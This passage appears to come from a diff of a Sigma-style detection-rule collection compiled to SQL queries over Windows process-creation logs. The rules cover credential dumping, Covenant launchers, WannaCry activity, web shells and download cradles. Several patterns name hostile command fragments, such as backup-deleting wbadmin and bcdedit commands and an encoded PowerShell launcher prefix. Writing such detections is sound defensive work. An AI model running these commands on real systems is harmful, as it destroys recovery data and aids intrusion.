'\\'))))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%\\\\CL\\_LoadAssembly.ps1%' ESCAPE '\\' OR CommandLine LIKE '%LoadAssemblyFromPath %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_msdt_arbitrary_command_execution.yml" + "filename": "proc_creation_win_lolbin_cl_loadassembly.yml" }, { - "title": "Suspicious X509Enrollment - Process Creation", - "id": "114de787-4eb2-48cc-abdb-c0b449f93ea4", + "title": "DumpMinitool Execution", + "id": "dee0a7a3-f200-4112-a99b-952196d81e42", "status": "experimental", - "description": "Detect use of X509Enrollment", - "author": "frack113", + "description": "Detects the use of \"DumpMinitool.exe\" a tool that allows the dump of process memory via the use of the \"MiniDumpWriteDump\"", + "author": "Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)", + "tags": [ + "attack.defense_evasion", + "attack.t1036", + "attack.t1003.001" + ], "falsepositives": [ - "Legitimate administrative script" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%X509Enrollment.CBinaryConverter%' ESCAPE '\\' OR CommandLine LIKE '%884e2002-217d-11da-b2a4-000e7bbb2b09%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\DumpMinitool.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\DumpMinitool.x86.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\DumpMinitool.arm64.exe' ESCAPE '\\') OR OriginalFileName IN ('DumpMinitool.exe', 'DumpMinitool.x86.exe', 'DumpMinitool.arm64.exe')) AND (CommandLine LIKE '% Full%' ESCAPE '\\' OR CommandLine LIKE '% Mini%' ESCAPE '\\' OR CommandLine LIKE '% WithHeap%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_x509enrollment.yml" + "filename": "proc_creation_win_dumpminitool_execution.yml" }, { - "title": "HackTool - Covenant PowerShell Launcher", - "id": "c260b6db-48ba-4b4a-a76f-2f67644e99d2", + "title": "Command Line Execution with Suspicious URL and AppData Strings", + "id": "1ac8666b-046f-4201-8aba-1951aaec03a3", "status": "test", - "description": "Detects suspicious command lines used in Covenant luanchers", + "description": "Detects a suspicious command line execution that includes an URL and AppData string in the command line parameters as used by several droppers (js/vbs > powershell)", "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community", "tags": [ "attack.execution", - "attack.defense_evasion", + "attack.command_and_control", + "attack.t1059.003", "attack.t1059.001", - "attack.t1564.003" + "attack.t1105" + ], + "falsepositives": [ + "High" + ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\' AND CommandLine LIKE '%://%' ESCAPE '\\' AND CommandLine LIKE '%\\%AppData\\%%' ESCAPE '\\')" + ], + "filename": "proc_creation_win_cmd_http_appdata.yml" + }, + { + "title": "HackTool - Hydra Password Bruteforce Execution", + "id": "aaafa146-074c-11eb-adc1-0242ac120002", + "status": "test", + "description": "Detects command line parameters used by Hydra password guessing hack tool", + "author": "Vasiliy Burov", + "tags": [ + "attack.credential_access", + "attack.t1110", + "attack.t1110.001" + ], + "falsepositives": [ + "Software that uses the caret encased keywords PASS and USER in its command line" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%-Sta%' ESCAPE '\\' AND CommandLine LIKE '%-Nop%' ESCAPE '\\' AND CommandLine LIKE '%-Window%' ESCAPE '\\' AND CommandLine LIKE '%Hidden%' ESCAPE '\\' AND (CommandLine LIKE '%-Command%' ESCAPE '\\' OR CommandLine LIKE '%-EncodedCommand%' ESCAPE '\\')) OR (CommandLine LIKE '%sv o (New-Object IO.MemorySteam);sv d %' ESCAPE '\\' OR CommandLine LIKE '%mshta file.hta%' ESCAPE '\\' OR CommandLine LIKE '%GruntHTTP%' ESCAPE '\\' OR CommandLine LIKE '%-EncodedCommand cwB2ACAAbwAgA%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%-u %' ESCAPE '\\' AND CommandLine LIKE '%-p %' ESCAPE '\\' AND (CommandLine LIKE '%^USER^%' ESCAPE '\\' OR CommandLine LIKE '%^PASS^%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_covenant.yml" + "filename": "proc_creation_win_hktl_hydra.yml" }, { - "title": "System File Execution Location Anomaly", - "id": "e4a6b256-3e47-40fc-89d2-7a477edd6915", + "title": "Suspicious New Service Creation", + "id": "17a1be64-8d88-40bf-b5ff-a4f7a50ebcc8", "status": "experimental", - "description": "Detects a Windows program executable started from a suspicious folder", - "author": "Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali", + "description": "Detects creation of a new service via \"sc\" command or the powershell \"new-service\" cmdlet with suspicious binary paths", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1036" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1543.003" ], "falsepositives": [ - "Exotic software" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\services.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\lsass.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\smss.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\csrss.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\conhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wininit.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\lsm.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winlogon.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\taskhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Taskmgr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sihost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\RuntimeBroker.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\smartscreen.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\audiodg.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wlanext.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dashost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wsl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\atbroker.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bcdedit.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certreq.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\consent.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\defrag.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dism.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dllhst3g.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\eventvwr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\runonce.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winver.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\logonui.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\userinit.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dwm.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\LsaIso.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ntoskrnl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wsmprovhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dfrgui.exe' ESCAPE '\\') AND NOT (((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\') OR NewProcessName LIKE '%\\\\SystemRoot\\\\System32\\\\%' ESCAPE '\\' OR (NewProcessName LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\PowerShell\\\\7\\\\pwsh.exe' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\MicrosoftCorporationII.WindowsSubsystemForLinux%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\wsl.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' AND CommandLine LIKE '%create%' ESCAPE '\\' AND CommandLine LIKE '%binPath=%' ESCAPE '\\') OR (CommandLine LIKE '%New-Service%' ESCAPE '\\' AND CommandLine LIKE '%-BinaryPathName%' ESCAPE '\\')) AND (CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%svchost%' ESCAPE '\\' OR CommandLine LIKE '%dllhost%' ESCAPE '\\' OR CommandLine LIKE '%cmd %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_system_exe_anomaly.yml" + "filename": "proc_creation_win_susp_service_creation.yml" }, { - "title": "Suspicious Dump64.exe Execution", - "id": "129966c9-de17-4334-a123-8b58172e664d", - "status": "test", - "description": "Detects when a user bypasses Defender by renaming a tool to dump64.exe and placing it in a Visual Studio folder", - "author": "Austin Songer @austinsonger, Florian Roth", + "title": "Suspicious Invoke-WebRequest Execution With DirectIP", + "id": "1edff897-9146-48d2-9066-52e8d8f80a2f", + "status": "experimental", + "description": "Detects calls to PowerShell with Invoke-WebRequest cmdlet using direct IP access", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Dump64.exe in other folders than the excluded one" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\dump64.exe' ESCAPE '\\' AND NOT (NewProcessName LIKE '%\\\\Installer\\\\Feedback\\\\dump64.exe%' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\dump64.exe' ESCAPE '\\' AND (CommandLine LIKE '% -ma %' ESCAPE '\\' OR CommandLine LIKE '%accepteula%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%curl %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\' OR CommandLine LIKE '%wget %' ESCAPE '\\') AND (CommandLine LIKE '%://1%' ESCAPE '\\' OR CommandLine LIKE '%://2%' ESCAPE '\\' OR CommandLine LIKE '%://3%' ESCAPE '\\' OR CommandLine LIKE '%://4%' ESCAPE '\\' OR CommandLine LIKE '%://5%' ESCAPE '\\' OR CommandLine LIKE '%://6%' ESCAPE '\\' OR CommandLine LIKE '%://7%' ESCAPE '\\' OR CommandLine LIKE '%://8%' ESCAPE '\\' OR CommandLine LIKE '%://9%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_dump64.yml" + "filename": "proc_creation_win_powershell_invoke_webrequest_direct_ip.yml" }, { - "title": "RDP Connection Allowed Via Netsh.EXE", - "id": "01aeb693-138d-49d2-9403-c4f52d7d3d62", + "title": "WannaCry Ransomware Activity", + "id": "41d40bff-377a-43e2-8e1b-2e543069e079", "status": "test", - "description": "Detects usage of the netsh command to open and allow connections to port 3389 (RDP). As seen used by Sarwent Malware", - "author": "Sander Wiebing", + "description": "Detects WannaCry ransomware activity", + "author": "Florian Roth (Nextron Systems), Tom U. @c_APT_ure (collection), oscd.community, Jonhnathan Ribeiro", "tags": [ + "attack.lateral_movement", + "attack.t1210", + "attack.discovery", + "attack.t1083", "attack.defense_evasion", - "attack.t1562.004" + "attack.t1222.001", + "attack.impact", + "attack.t1486", + "attack.t1490" ], "falsepositives": [ - "Legitimate administration activity" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND (CommandLine LIKE '%firewall %' ESCAPE '\\' AND CommandLine LIKE '%add %' ESCAPE '\\' AND CommandLine LIKE '%tcp %' ESCAPE '\\' AND CommandLine LIKE '%3389%' ESCAPE '\\') AND (CommandLine LIKE '%portopening%' ESCAPE '\\' OR (CommandLine LIKE '%advfirewall%' ESCAPE '\\' AND CommandLine LIKE '%rule%' ESCAPE '\\' AND CommandLine LIKE '%allow%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\tasksche.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mssecsvc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\taskdl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\taskhsvc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\taskse.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\111.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\lhdfrgui.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\linuxnew.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wannacry.exe' ESCAPE '\\') OR NewProcessName LIKE '%WanaDecryptor%' ESCAPE '\\' OR (CommandLine LIKE '%icacls%' ESCAPE '\\' AND CommandLine LIKE '%/grant%' ESCAPE '\\' AND CommandLine LIKE '%Everyone:F%' ESCAPE '\\' AND CommandLine LIKE '%/T%' ESCAPE '\\' AND CommandLine LIKE '%/C%' ESCAPE '\\' AND CommandLine LIKE '%/Q%' ESCAPE '\\') OR (CommandLine LIKE '%bcdedit%' ESCAPE '\\' AND CommandLine LIKE '%/set%' ESCAPE '\\' AND CommandLine LIKE '%{default}%' ESCAPE '\\' AND CommandLine LIKE '%recoveryenabled%' ESCAPE '\\' AND CommandLine LIKE '%no%' ESCAPE '\\') OR (CommandLine LIKE '%wbadmin%' ESCAPE '\\' AND CommandLine LIKE '%delete%' ESCAPE '\\' AND CommandLine LIKE '%catalog%' ESCAPE '\\' AND CommandLine LIKE '%-quiet%' ESCAPE '\\') OR CommandLine LIKE '%@Please\\_Read\\_Me@.txt%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_netsh_fw_allow_rdp.yml" + "filename": "proc_creation_win_malware_wannacry.yml" }, { - "title": "APT29 2018 Phishing Campaign CommandLine Indicators", - "id": "7453575c-a747-40b9-839b-125a0aae324b", - "status": "stable", - "description": "Detects indicators of APT 29 (Cozy Bear) phishing-campaign as reported by mandiant", - "author": "Florian Roth (Nextron Systems), @41thexplorer", + "title": "Security Privileges Enumeration Via Whoami.EXE", + "id": "97a80ec7-0e2f-4d05-9ef4-65760e634f6b", + "status": "experimental", + "description": "Detects a whoami.exe executed with the /priv command line flag instructing the tool to show all current user privileges. This is often used after a privilege escalation attempt.", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1218.011" + "attack.privilege_escalation", + "attack.discovery", + "attack.t1033" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%-noni -ep bypass $%' ESCAPE '\\' OR (CommandLine LIKE '%cyzfc.dat,%' ESCAPE '\\' AND CommandLine LIKE '%PointFunctionCall%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR OriginalFileName = 'whoami.exe') AND (CommandLine LIKE '% /priv%' ESCAPE '\\' OR CommandLine LIKE '% -priv%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_apt29_phishing_campaign_indicators.yml" + "filename": "proc_creation_win_whoami_priv_discovery.yml" }, { - "title": "Invoke-Obfuscation Obfuscated IEX Invocation", - "id": "4bf943c6-5146-4273-98dd-e958fd1e3abf", - "status": "test", - "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the following code block", - "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", + "title": "Download Arbitrary Files Via PresentationHost.exe", + "id": "b124ddf4-778d-418e-907f-6dd3fc0d31cd", + "status": "experimental", + "description": "Detects usage of \"PresentationHost\" which is a utility that runs \".xbap\" (Browser Applications) files to download arbitrary files", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1027", "attack.execution", - "attack.t1059.001" + "attack.t1218" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine REGEXP '\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[' OR CommandLine REGEXP '\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[' OR CommandLine REGEXP '\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[' OR CommandLine REGEXP '\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}' OR CommandLine REGEXP '\\*mdr\\*\\W\\s*\\)\\.Name' OR CommandLine REGEXP '\\$VerbosePreference\\.ToString\\(' OR CommandLine REGEXP '\\[String\\]\\s*\\$VerbosePreference'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\presentationhost.exe' ESCAPE '\\' OR OriginalFileName = 'PresentationHost.exe') AND (CommandLine LIKE '%http://%' ESCAPE '\\' OR CommandLine LIKE '%https://%' ESCAPE '\\' OR CommandLine LIKE '%ftp://%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_invoke_obfuscation_obfuscated_iex_commandline.yml" + "filename": "proc_creation_win_lolbin_presentationhost_download.yml" }, { - "title": "Renamed AutoHotkey.EXE Execution", - "id": "0f16d9cf-0616-45c8-8fad-becc11b5a41c", + "title": "Shells Spawned by Web Servers", + "id": "8202070f-edeb-4d31-a010-a26c72ac5600", "status": "test", - "description": "Detects execution of a renamed autohotkey.exe binary based on PE metadata fields", - "author": "Nasreddine Bencherchali", + "description": "Detects web servers that spawn shell processes which could be the result of a successfully placed web shell or another attack", + "author": "Thomas Patzke, Florian Roth (Nextron Systems), Zach Stanford @svch0st, Tim Shelton, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.persistence", + "attack.t1505.003", + "attack.t1190" ], "falsepositives": [ - "Unknown" + "Particular web applications may spawn a shell process legitimately" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Product LIKE '%AutoHotkey%' ESCAPE '\\' OR Description LIKE '%AutoHotkey%' ESCAPE '\\' OR OriginalFileName IN ('AutoHotkey.exe', 'AutoHotkey.rc')) AND NOT ((NewProcessName LIKE '%\\\\AutoHotkey.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AutoHotkey32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AutoHotkey32\\_UIA.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AutoHotkey64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AutoHotkey64\\_UIA.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AutoHotkeyA32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AutoHotkeyA32\\_UIA.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AutoHotkeyU32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AutoHotkeyU32\\_UIA.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AutoHotkeyU64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AutoHotkeyU64\\_UIA.exe' ESCAPE '\\') OR NewProcessName LIKE '%\\\\AutoHotkey%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((ParentProcessName LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\php.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\httpd.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\caddy.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\ws\\_TomcatService.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\tomcat.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\UMWorkerProcess.exe' ESCAPE '\\') OR ((ParentProcessName LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (ParentProcessName LIKE '%-tomcat-%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\tomcat%' ESCAPE '\\')) OR ((ParentProcessName LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (ParentCommandLine LIKE '%catalina.jar%' ESCAPE '\\' OR ParentCommandLine LIKE '%CATALINA\\_HOME%' ESCAPE '\\' OR ParentCommandLine LIKE '%catalina.home%' ESCAPE '\\'))) AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\arp.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\at.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dsget.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dsquery.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\find.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\findstr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\fsutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hostname.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ipconfig.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\nbtstat.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\netdom.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\netsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\netstat.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\nltest.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\nslookup.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ntdutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pathping.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ping.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\qprocess.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\query.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\qwinsta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\tasklist.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\tracert.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ver.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wevtutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wusa.exe' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%Windows\\\\system32\\\\cmd.exe /c C:\\\\ManageEngine\\\\ADManager \"Plus\\\\ES\\\\bin\\\\elasticsearch.bat -Enode.name=RMP-NODE1 -pelasticsearch-pid.txt' ESCAPE '\\') OR (CommandLine LIKE '%sc query%' ESCAPE '\\' AND CommandLine LIKE '%ADManager Plus%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_renamed_autohotkey.yml" + "filename": "proc_creation_win_webshell_spawn.yml" }, { - "title": "Suspicious PowerShell Invocation From Script Engines", - "id": "95eadcb2-92e4-4ed1-9031-92547773a6db", - "status": "test", - "description": "Detects suspicious powershell invocations from interpreters or unusual programs", - "author": "Florian Roth (Nextron Systems)", + "title": "Process Creation Using Sysnative Folder", + "id": "3c1b5fb0-c72f-45ba-abd1-4d4c353144ab", + "status": "experimental", + "description": "Detects process creation events that use the Sysnative folder (common for CobaltStrike spawns)", + "author": "Max Altgelt (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.t1055" ], "falsepositives": [ - "Microsoft Operations Manager (MOM)", - "Other scripts" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\')) AND NOT ((CurrentDirectory LIKE '%\\\\Health Service State\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE 'C:\\\\Windows\\\\Sysnative\\\\%' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_script_engine_parent.yml" + "filename": "proc_creation_win_susp_sysnative.yml" }, { - "title": "PDQ Deploy Remote Adminstartion Tool Execution", - "id": "d679950c-abb7-43a6-80fb-2a480c4fc450", + "title": "Import LDAP Data Interchange Format File Via Ldifde.EXE", + "id": "6f535e01-ca1f-40be-ab8d-45b19c0c8b7f", "status": "experimental", - "description": "Detect use of PDQ Deploy remote admin tool", - "author": "frack113", + "description": "Detects the execution of \"Ldifde.exe\" with the import flag \"-i\". The can be abused to include HTTP-based arguments which will allow the 